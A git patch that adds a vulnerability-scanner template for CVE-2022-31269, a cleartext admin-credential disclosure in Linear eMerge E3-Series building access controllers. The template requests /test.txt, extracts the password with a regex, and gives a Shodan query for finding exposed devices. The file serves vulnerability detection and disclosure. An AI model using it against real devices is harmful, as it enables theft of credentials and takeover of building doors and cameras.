From 7b48166c29fcdb6ae0b14b8fd6392301d846ab2d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9E=97=E5=AF=92?= <57119052+For3stCo1d@users.noreply.github.com> Date: Thu, 11 Aug 2022 13:26:52 +0800 Subject: [PATCH] Create CVE-2022-31269.yaml --- cves/2022/CVE-2022-31269.yaml | 41 +++++++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 cves/2022/CVE-2022-31269.yaml diff --git a/cves/2022/CVE-2022-31269.yaml b/cves/2022/CVE-2022-31269.yaml new file mode 100644 index 0000000000..d1261846b8 --- /dev/null +++ b/cves/2022/CVE-2022-31269.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-31269 + +info: + name: eMerge E3-Series - Information Disclosure + author: For3stCo1d + severity: high + description: | + Admin credentials are stored in clear text at the endpoint /test.txt (This occurs in situations where the default credentials admin:admin have beenchanged.) Allows an unauthenticated attacker to obtain adminicredentials, access the admin dashboard of Linear eMerge E3-Series devices, control entire building doors, cameras, elevator, etc... and access information about employees who can access the building and take control of the entire building. + reference: + - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-31269 + metadata: + shodan-query: http.title:"Linear eMerge" + tags: cve,cve2022,emerge,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/test.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "ID=" + - "Password=" + condition: and + + - type: word + part: header + words: + - text/plain + + - type: status + status: + - 200 + + extractors: + - type: regex + regex: + - Password='(.+?)'